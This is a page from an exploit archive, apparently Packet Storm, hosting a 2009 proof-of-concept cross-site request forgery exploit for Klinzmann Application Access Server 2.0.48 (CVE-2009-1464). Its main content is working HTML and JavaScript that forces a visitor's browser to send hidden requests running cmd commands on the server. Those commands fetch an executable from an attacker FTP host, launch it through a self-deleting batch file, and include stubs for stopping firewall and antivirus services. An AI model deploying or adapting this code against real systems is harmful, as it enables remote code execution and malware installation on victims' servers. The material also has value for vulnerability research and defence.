exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Klinzmann A-A-S 2.0.48 XSRF Exploit

Klinzmann A-A-S 2.0.48 XSRF Exploit
Posted May 13, 2009
Authored by Felipe Daragon | Site syhunt.com

Klinzmann Application Access Server version 2.0.48 cross site request forgery exploit.

tags | exploit, csrf
advisories | CVE-2009-1464
SHA-256 | 8fbdf9086123ab178a93c6aa387ee37b227bad398eb09b10822fe24d631ab585

Klinzmann A-A-S 2.0.48 XSRF Exploit

Change Mirror Download
<html>
<body>

<!--
****************************************************************
AASHack 1.0 (By Felipe M. Aragon)
Affected Versions: AAS 2.0.48 and possibly older versions

This is an exploit demonstration code for the A-A-S (Application
Access Server) index.aas job parameter XSRF vulnerability
(CVE-2009-1464)

This script has been successfully tested on IE 7.0 and Firefox
3.08. Should work on any browser that has javascript enabled

Vulnerability found by Syhunt (http://www.syhunt.com)

This script should be used only by system administrators (or
other people in charge). Read the text below before making any
use of this script.

(c) 2009 Syhunt Cyber Security Company. All rights reserved.

This script is provided 'as-is', without any expressed or implied
warranty. In no event will the author be held liable for
any damages arising from the use of this script.
Permission is granted to anyone to use this script, and to alter
it and redistribute it freely, subject to the following
restrictions:

1. The origin of this script must not be misrepresented, you
must not claim that you wrote the original code.
2. Altered source versions must be plainly marked as such, and
must not be misrepresented as being the original script.
3. This notice may not be removed or altered from any source
distribution.

If you have any questions concerning this license, please email
contact _at_ syhunt _dot_ com
****************************************************************
-->

<script>
// Javascript is used to force the browser to sequentially load
// the images that will trigger the server commands.

var dd=1000; // default delay time (ms)
var aas_url='http://[host]:6262'; // target AAS host
var ftp_host='x.x.x.x'; // attacker ftp host
var ftp_user='anonymous';
var ftp_pass='123456';
var ftp_commands_file='aashack.ftp';
var batch_file='aashack.bat';
var attacker_file='file.exe'; // file to upload

function delay(ms) {
var date = new Date();
var curDate = null;
do { curDate = new Date(); }
while(curDate-date < ms);
}

function writeimg(job,action,select) {
var act = escape(action);
var sel = escape(select);
document.write('<img src="'+aas_url+'/index.aas?job='+job+'&action='+act+'&select='+sel+'" style="visibility:hidden;">');
}

// Main Functions
function Run(action,dms) { writeimg('command',action,''); delay(dms); }
function Console(cmdline,dms) { Run('cmd /C '+cmdline,dms); }
function AddFTPCmd(cmdline) { Console('echo '+cmdline+'>>'+ftp_commands_file,dd); }
function AddBatchLine(line) { Console('echo '+line+'>>'+batch_file,dd); }
//function Kill(exename) { Run('taskkill /f /im '+exename,dd); } // alternative way to kill a process
function StopSvc(servicename) { writeimg('setservice','stop',servicename); delay(dd); }
function KillProcess(exename) { writeimg('killprocess','',exename); delay(dd); }

function StopUndesiredServices() {
//StopSvc("somefirewall");
//StopSvc("someantivirus");
//StopSvc("wuauserv"); // Automatic Updates
}

function KillUndesiredProcesses() {
//KillProcess('firewall.exe');
}

AddFTPCmd(ftp_user);
AddFTPCmd(ftp_pass);
AddFTPCmd('binary');
AddFTPCmd('get '+attacker_file);
AddFTPCmd('close');
AddFTPCmd('bye');
AddBatchLine('@echo off');
AddBatchLine('ftp -is:'+ftp_commands_file+' '+ftp_host);
AddBatchLine('start '+attacker_file);
AddBatchLine('del '+ftp_commands_file);
AddBatchLine('del %0'); // self-destruct
StopUndesiredServices();
KillUndesiredProcesses();
Run(batch_file,dd);
</script>

</body>
</html>


Login or Register to add favorites

File Archive:

August 2022

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Aug 1st
    20 Files
  • 2
    Aug 2nd
    4 Files
  • 3
    Aug 3rd
    6 Files
  • 4
    Aug 4th
    55 Files
  • 5
    Aug 5th
    16 Files
  • 6
    Aug 6th
    0 Files
  • 7
    Aug 7th
    0 Files
  • 8
    Aug 8th
    13 Files
  • 9
    Aug 9th
    0 Files
  • 10
    Aug 10th
    0 Files
  • 11
    Aug 11th
    0 Files
  • 12
    Aug 12th
    0 Files
  • 13
    Aug 13th
    0 Files
  • 14
    Aug 14th
    0 Files
  • 15
    Aug 15th
    0 Files
  • 16
    Aug 16th
    0 Files
  • 17
    Aug 17th
    0 Files
  • 18
    Aug 18th
    0 Files
  • 19
    Aug 19th
    0 Files
  • 20
    Aug 20th
    0 Files
  • 21
    Aug 21st
    0 Files
  • 22
    Aug 22nd
    0 Files
  • 23
    Aug 23rd
    0 Files
  • 24
    Aug 24th
    0 Files
  • 25
    Aug 25th
    0 Files
  • 26
    Aug 26th
    0 Files
  • 27
    Aug 27th
    0 Files
  • 28
    Aug 28th
    0 Files
  • 29
    Aug 29th
    0 Files
  • 30
    Aug 30th
    0 Files
  • 31
    Aug 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Hosting By
Rokasec
close